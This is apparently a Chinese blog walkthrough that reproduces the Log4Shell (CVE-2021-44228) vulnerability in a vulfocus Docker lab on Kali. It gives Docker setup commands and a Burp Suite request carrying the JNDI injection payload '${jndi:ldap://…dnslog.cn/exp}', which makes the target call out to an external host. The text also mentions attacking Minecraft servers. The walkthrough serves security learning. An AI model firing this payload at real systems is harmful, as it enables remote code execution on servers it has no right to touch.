北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228

本次漏洞复现采用vulfocus的log4j2靶场docker

使用Kali系统进行复现实验

在Kali系统中并未默认安装Docker,可以通过运行以下命令安装

sudo apt-get update && sudo apt-get install docker docker docker-compose -y

是否安装完成Docker可以通过以下命令查看docker 版本

docker -v

如下图便已安装完成

是否安装完成Docker-compose可以通过以下命令查看docker-compose版本

docker-compose version

如下图便已安装完成

之后,我们便可拉取相关镜像靶场

在Vulfocus中有着许多靶场提供可以通过链接查看并学习Docker Hub

#开启docker 的服务
service docker start
#拉取镜像
docker pull vulfocus/log4j2-rce-2021-12-09

通过以下命令查看拉取的镜像

docker images

如下图便已拉取镜像

接下来便是开启Docker

用38080端口替换8080端口进行访问服务

docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

接下来打开浏览器输入URL:http://172.17.0.1:38080/hello

看到以下画面便成功访问了

接下来开启BurpSuite,将网页代理改为BurpSuite代理

用Repeater打开

接下来要对其提交内容进行修改

POST /hello HTTP/1.1Host: 172.17.0.1:38080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 45Origin: http://172.17.0.1:38080DNT: 1Connection: closeReferer:http://172.17.0.1:38080/helloUpgrade-Insecure-Requests: 1Sec-GPC: 1payload=${jndi:ldap://ts777b.dnslog.cn/exp}

其中ts777b.dnslog.cn这个地址自己生成URL:DNSLog Platform

按下Get SubDomain 便能够生成你自己的DNSlog并将生成的地址替换进payload=${jndi:ldap://DNSLog/exp},然后发生数据给靶机。

回到DNSLog页面刷新Refresh Record

便能查询道靶机递归查询日志的记录。

Log4J2漏洞的危害便是能够远程执行代码,并且采用此框架件的厂商众多,造成的危害面广

我的世界》(Minecraft)沙盒游戏便是采用之一,利用其联机服务,便可以通过此CVE-2021-44228漏洞对其中主机进行权限获取

Log4J2 靶场漏洞复现相关推荐

  1. 渗透测试——joker靶场漏洞复现

    目录 理论 渗透测试流程以及每个阶段需要做的事情 信息收集需要收集的内容,以及收集的方式 NMAP有哪些功能(写出参数) Burpsuite有哪些功能模块(详细说明) 实战 暴力破解得到反弹shell ...

  2. Apache Log4j2漏洞复现

    0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲.或分或合.起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱 ...

  3. Vulhub靶场之struts2漏洞复现

    简介 struts2漏洞中属s2系列杀伤力最大,可以造成远程命令执行漏洞. Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架.Apache Struts于2020年 ...

  4. vulhub靶场thinkphp漏洞复现

    0x01.ThinkPHP 2.x 任意代码执行漏洞 原理 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'. ...

  5. vulhub靶场-weblogic漏洞复现

    目录 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-1 ...

  6. Apache Log4j2 RCE漏洞利用反弹shell合集

    目录 一.漏洞描述 二.漏洞复现 1. bugku靶场 反弹shell 命令执行 2. 掌控安全 反弹shell 三.Burp扫描插件 四.修复建议 一.漏洞描述 2021年11月24日,阿里云安全团 ...

  7. [ 新出漏洞篇 ] 核弹级漏洞 Log4j2 RCE 漏洞爆出,开发圈苦逼,安全圈过年,你赶上了吗 ?(外行都能看懂的漏洞分析)

    Log4j2相信大家不陌生了~~~哈哈哈哈. 相信大家已经被 Log4j2 的重大漏洞刷屏了.几乎没有互联网公司幸免. 估计有不少开发的小伙伴在此前为了修 bug 已经累趴下了. 估计也有不少安全圈的 ...

  8. Appweb(CVE-2018-8715)漏洞复现与思考

    目录 Appweb简介 漏洞原理 漏洞影响范围 漏洞复现 思考 Appweb简介 Appweb是一个嵌入式HTTP Web服务器,主要的设计思路是安全.这是直接集成到客户的应用和设备,便于开发和部署基 ...

  9. 追洞小组 | Jdbc反序列化漏洞复现浅析

    目录 1.前言+靶场搭建  2.漏洞复现  3.漏洞分析 4.漏洞修复  5.心得 前言+靶场搭建 很多时候我们获得密码之后进入后台管理的界面,有些上传的漏洞或者sql注入无法getshell,但是如 ...

  10. weblogic中ssrf漏洞修复_Weblogic-SSRF漏洞复现

    0x00简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发.集成.部署和管理大型分 ...

最新文章

  1. 用TVM在硬件平台上部署深度学习工作负载的端到端 IR 堆栈
  2. 18000 台服务器整整瘫痪了三天:因 BoltDB 糟糕的设计
  3. JQuery+ajax+jsonp 跨域访问
  4. php error 2,一起搞懂PHP的错误和异常(二)
  5. SpringMVC中跳转路径的问题
  6. iam身份验证以及访问控制_如何将受限访问IAM用户添加到EKS群集
  7. Android Service与IntentService区别
  8. springBoot修改代码不需要重启-热部署
  9. 网易云深度学习第二课Notebook3
  10. SyntaxError: unexpected EOF while parsing成功解决
  11. 20145240《Java程序设计》第二周学习总结
  12. c语言邻接表存储拓扑排序,拓扑排序(完整案列及C语言完整代码实现)
  13. webRTC初探:如何实现音视频的录制
  14. 女生做软件测试的利弊如何权衡?
  15. 来自Bitly的USA.gov数据,数据分析案例
  16. Python中可视化工具包Matplotlib和Visdom介绍
  17. 我们更需要指数型的AB产品(长盛同庆、基金瑞福)
  18. oracle数据库优化 -DBA常用Oracle数据库检查报告
  19. 硬件架构“变天”了,不能只见树木不见森林
  20. 微信多图上传,解决android多图上传失败问题

热门文章

  1. IDEA从零到精通(29)之chinese中文汉化插件
  2. Gambit建模中split的用法
  3. android小游戏代码
  4. 阿里云盘下载安装保存文件教程
  5. sql优化常见的几种思路
  6. devgis分享 只分享有价值的东西!http://download.csdn.net/user/devgis
  7. 【C语言编程】实现猜数字游戏
  8. java7jdk官网下载安装,JDK官方网站下载、安装教程及环境配置,jdk官方网站
  9. MATLAB将界面语言由中文改成英文
  10. java开发spc分析软件,SPC、五大工具带你深入实战......OMG,收藏!